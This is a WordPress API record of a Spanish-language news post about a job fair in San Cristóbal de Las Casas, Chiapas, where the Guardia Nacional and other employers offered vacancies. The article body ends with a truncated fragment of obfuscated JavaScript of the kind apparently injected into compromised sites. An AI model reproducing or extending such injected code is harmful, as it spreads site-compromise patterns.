{"id":11924,"date":"2023-09-22T07:18:55","date_gmt":"2023-09-22T07:18:55","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11924"},"modified":"2023-09-22T07:18:55","modified_gmt":"2023-09-22T07:18:55","slug":"participa-la-guardia-nacional-en-la-segunda-feria-del-empleo-en-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11924","title":{"rendered":"Participa La Guardia Nacional en la segunda feria del empleo en San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"465\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-21-at-4.48.06-PM-1024x465.jpeg\" alt=\"\" class=\"wp-image-11925\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-21-at-4.48.06-PM-1024x465.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-21-at-4.48.06-PM-300x136.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-21-at-4.48.06-PM-768x349.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-21-at-4.48.06-PM-1536x698.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-21-at-4.48.06-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal22 de septiembre del 2023. San Crist\u00f3bal de Las Casas.- Ana Keyla \u00c1lvarez Arzate, Subsecretaria del Servicio Nacional de Empleo Chiapas, dio a conocer que en la segunda feria del empleo que se realiz\u00f3 en San Crist\u00f3bal este jueves 21 de septiembre, participaron 38 empresas locales y for\u00e1neas, destac\u00e1ndose la presencia de la Guardia Nacional, con una oferta de m\u00e1s de 400 vacantes, quienes ofrecieron desde el salario b\u00e1sico al m\u00e1s alto del estado de Quintana Roo.\u201cTenemos diferentes vacantes, desde operativos hasta perfiles profesionales, tenemos a la Guardia Nacional. Vemos menos personas que las ferias pasadas buscando trabajo, ha bajado el n\u00famero de buscadores de empleo, la \u00faltima feria tuvimos 300 personas, lo que nos indica que est\u00e1 bajando el \u00edndice de desempleo en Chiapas\u201d, dijo.Entrevistada al finalizar el acto protocolario, la funcionaria consider\u00f3 que el trabajo se vinculaci\u00f3n, reclutamiento especial, d\u00edas por el empleo, entre otras actividades, han ayudado a que m\u00e1s personas est\u00e9n ya trabajando, pero aun as\u00ed, buscan promoviendo estas actividades.\u00c1lvarez Arzate dej\u00f3 ver que esta actividad es solo el inicio de un proceso, ya que en un mes y medio, las empresas deben reportar a las oficinas de empleo, cu\u00e1ntas personas lograron vincularse y quedarse a trabajar en cada una de las vacantes.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal22 de septiembre del 2023. San Crist\u00f3bal de Las Casas.- Ana Keyla \u00c1lvarez Arzate, Subsecretaria del Servicio Nacional de Empleo Chiapas, dio a conocer que en la segunda feria del empleo que se realiz\u00f3 en San Crist\u00f3bal este jueves 21 de septiembre, participaron 38 empresas locales y for\u00e1neas, destac\u00e1ndose la presencia de la Guardia &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11925,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-11924","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11924","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11924"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11924\/revisions"}],"predecessor-version":[{"id":11926,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11924\/revisions\/11926"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11925"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11924"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11924"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11924"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}